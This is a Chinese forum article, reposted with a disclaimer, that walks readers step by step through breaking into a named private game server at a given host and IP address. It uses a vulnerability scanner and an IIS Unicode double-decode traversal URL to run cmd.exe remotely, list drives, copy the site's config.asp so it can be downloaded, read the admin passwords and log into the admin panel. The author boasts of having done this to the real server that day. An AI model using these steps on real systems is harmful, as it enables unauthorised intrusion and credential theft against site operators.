现在的SF,其实漏洞都很多
现在介绍一个入侵的方法
实验对象:http://u9.vicp.net
工具:x-way扫描器
下载地址:http://wvw.ttian.net/download/show.php?id=20
下载完后解压到一个目录,然后运行那个小人
点工具-查询器-DNS查询-输入u9.vicp.net
查询出他的IP是222.84.241.226
点高级扫描,输入222.84.241.226这个IP地址
点cgi规则,选winnt/2000
点探测设置 ,将那个30设置成1
然后点确定开始扫描
扫描完后会出现是不是查看扫描报告的窗口,点确定查看扫描报告
(晕啊,这个服务器连unicode漏洞都有哦)
看到扫描报告的222.84.241.226/scripts/..%252f..%252f..%252f..%252fwinnt/system32
/cmd.exe?/c+dir这一个了么?
好了,点他
接着上面
看看,是不是进了他的c:\inetpub\scripts目录?里面的文件也一清2楚哦,呵呵
好了,再看看他的D盘有什么东东
在上面的地址后面写上+d:\,也就是最后成了c+dir+d:\了
呵呵,看到d盘了吧,原来他的站点文件都在d:\muweb目录啊
好,进他的muweb目录
看到了吧?里面好多asp文件哦
我们要的是他的config.asp文件
下面把上面的地址改成cmd.exe?/c+copy+d:\muweb\config.asp空格d:\muweb\a.bat
好了,这个样子你就把他的config文件复制了一个,并且改成了a.bat文件名
然后在地址栏输入http://u9.vicp.net/a.bat
把这个文件下载到你的硬盘里
右键点下载的文件,选择编辑
看到了吧?哈哈,所有的管理密码都在里面呢
然后进他的admin/login.asp吧,用你得到的用户名跟密码改你的人物吧,哈哈
--原创,大家不要随便转啊,也尊重一下我的劳动,这个服务器是我今天,也就是3月3号刚
刚黑的,随便转载的就太。。。无耻了:)---另,就在我发文章的时候,这个站点上不去了,但是他的sf服务器能进,我进去看看了,把我刚刚改的人物给删除了,估计现在正在调整他的iis的设置吧,等等大家看看站点能不能上
赶快封漏洞吧!
免责声明:57sf.com登载此文出于传递更多信息之目的,并不意味着57sf.com赞同其观点或证实其描述
|
